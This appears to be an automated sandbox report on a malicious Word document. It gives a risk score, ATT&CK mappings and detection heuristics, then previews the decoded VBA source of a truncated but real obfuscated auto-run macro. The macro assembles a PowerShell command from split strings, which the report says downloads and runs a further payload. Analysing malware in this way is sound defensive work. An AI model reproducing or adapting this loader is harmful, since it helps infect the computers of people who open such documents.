MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'Document_open' macro is configured to execute code via the Shell() function, indicating an attempt to download and run a secondary payload. The ClamAV detection 'Doc.Malware.Valyria-6874676-0' further supports its malicious nature.
Heuristics 6
-
ClamAV: Doc.Malware.Valyria-6874676-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6874676-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 48839 bytes |
SHA-256: df8dd97407b1aa12fffc1cca66d32544b79f2103c313f61d54648c874a86f792 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "uqEwBMSRDvsXwm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
vmPJl = (95024 - 3285 / 54662 * jjupM + (9513 + Niwov + 14828 / SEZcV * 38979 / TjSpM))
mTjOBp = (57689 - 61775 / 7946 * IYPfik + (7143 + ROWbX + 14674 / drsVGL * 17589 / TChodq))
vNzbA = (540 - 2091 / 24244 * aJaij + (59224 + fwpBYs + 84040 / NiYdEE * 93246 / iIcTf))
wUhwfj = (75402 - 6240 / 47118 * wNjGL + (91547 + OXzlKz + 70189 / pwcwva * 60593 / iXGqL))
kKrGsrGiiO = Application.Run("ZNHZmYwIdwBR", "" + ImOQYjiY + UwTczEKnawELU + QspEcS + kNfuEN + hjETzf + EmKphipPmJc + MhkCWbNQ + iXsYOdqiG + cANdQ + JjijXrC + osNYcDUs + jjmlGVUXVdU + OACrcM + bSppSpUdc + zNKOsOpzE + RzOmAM + SXnzpmH + pzhNvzM + MOSuwoXzzpjK)
vTrACb = (13806 - 49732 / 88508 * zZvumF + (17004 + zVMDQ + 25471 / Nshcv * 91340 / zdmsV))
wSnEjF = (10672 - 32454 / 89907 * twMQXD + (81214 + lKiLNf + 60927 / jsNiNt * 67173 / juIud))
End Sub
Attribute VB_Name = "IcTTiNTnZwp"
Function QspEcS()
On Error Resume Next
wriAa = 10245 * jmGzjf - 73397 + BTzPuW + 72313 - GzBRnS * 75382 + PzOrvl + 80257 * hNQGi
laCzfv = 11686 * CKwcAY - 77482 + QzYjjQ + 89495 - PdsihG * 58860 + MUQqk + 37709 * nJHLj
RZdkj = 75146 / WHcYb - baiOsj + CXkkV + (aXWJh * nWiiz - SdZTl + lmnonU / (hntztp / OQMmAw / 90302 / 41965))
SZwDGkOtvk = "" + jtUzHJKvUjOkB + KwjmQfHzIw + "pOw" + acFNrFnJoMGW + ZwKWjGk + "ERs" + OAKtKbvMDQYkTP + iNujwqJlOF + "hEl" + mNkBofqNjMdht + FdRGhrz + "l " + pBwYrZfEPHapf + nYFqRjMqznDHwz + " " + mHsLmhRVHhZRlZ + FWSImJnIdLA + Chr(34) + " . " + RiElLnhnMIFHj + KuEXZdCajWKd + "((g" + hbjjipwUjamf + NNBCZCwjGcLKPI + "v " + BJNDihZaB + pNilurINTVHD + "'*Md" + wUEUXZpzRZcR + foaAjPIVc + "R*'"
TTXMT = 32055 / XioKO + Yzmis / 80667 / 7629 * IDZBC * 99422 * 48318 / (nFsKQ * bkKjL)
THvEu = 86915 / vSjNU + dTwsw / 10002 / 17738 * IthfuH * 44817 * 4530 / (crMDES * sXjWWQ)
wrISXqjrvH = "" + OtEhTXtndai + QzLRQAwu + ")." + DwMYCYJiA + ofwUfBfAbRf + "NAME" + KmzSuCW + bAkHzrOUwdu + "[3" + SOwlwSuGAXc + PZrjzitID + ",1" + YBnlHVBaUiTk + DDpZacIw + "1,2" + pcMfPoTPSMM + JziWBqfwoVZ + "]-" + EjdTbbPLviI + fOESJzGX + "jOI"
VviSUY = 24858 / DSFZG + vqmiu / 21474 / 97283 * LaElPO * 46329 * 78116 / (wAPVP * ZCnPNz)
vGGGG = 60222 / Hnlok + lwkkhU / 26034 / 38976 * ArKQs * 42557 * 23869 / (nCYJhN * VJfuX)
MiNmfPwwD = "" + GFaTtQdK + jDOiIwBOzJZq + "N'')" + DMcGvkmGXvi + EvCTpilfiLTfQ + " ("
NKzAv = 70697 / CrBrXz + XkpJNb / 21494 / 82555 * itcWi * 968 * 20412 / (Lmfrj * QLTvrQ)
nBCsOh = 12232 / RJEzD + tuidu / 68091 / 54534 * dDFqzQ * 13248 * 7333 / (tIiWzS * vuYIk)
GuiQKu = 29533 / nWOAzd + SEzKwT / 94384 / 80872 * MJBUBJ * 53182 * 59911 / (BAcNO * tpPPw)
rbOJXvh = "" + TUXKjzWPNWp + TODBhhf + " \" + Chr(34) + wrmYzufUan + JBKqbUoWR + " $(" + dKsEspjAzqwYf + CcktwBUn + "SeT" + sLFMqOCbA + EpmirnBcK + "-itE"
SQSMmY = (46203 * IWirAi + 56544 * IbwzfO + 93210 + mzOFOT) * zkNsp + ibdDKA * 83987 - 42132
ANztAN = (59379 * EUUaoK + 35601 * oLjGml + 76898 + dzTuVN) * bnKOr + aKmGO * 77869 - 41063
MTzXwjuXRs = "" + TkjLjmsAOZGP + kdqPtmivaMOAwA + "M '" + STZMzJmBYovKAS + JrVlwGjS + "VAri" + KXzjqrcQHn + ubrorErTuIDDq + "ab" + nzMmGDbwPEr + ijLUUVz + "le:o" + JOcbpdBTuplMoR + jkScckz + "Fs' " + kLziiUHltpzKf + zvKBNqtRQTllfQ + " '" + PWnFREkLVd + cwqDVTfjZzszqt + "')\" + Chr(34) + zjcUbQhos + sKwjjPwpTdhP + Chr(43) + "[sT" + kzSdqPYYWOmB + MOCLNmnWbR + "ri" + sDMlPTRjqQPK + IUokuiIddEaWCY + "nG][" + YAUIWULkz + XdvwrITdSiqW + "Cha"
CwcVu = (59551 * uwGFi + 89841 * wbXWn + 30682 + fwfur) * tjDdOU + CiBDLV * 86310 - 66348
OaHLs = (31912 * lcrPpt + 43769 * IElbzl + 82 + FiOjvi) * idujIu + YGCrl * 2905 - 8365
PwpKd = (10646 * cnOsBc + 58313 * zGvJlv + 19578 + uEfiY) * AwdWj + mFUCci * 33950 - 92196
fjIFOYou = "" + ELPDBLuIdmWzwa + MNvdqNBCPZTLS + "R[" + IWmqjWpfsiFq + iEdIcjUbwCq + "]](
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.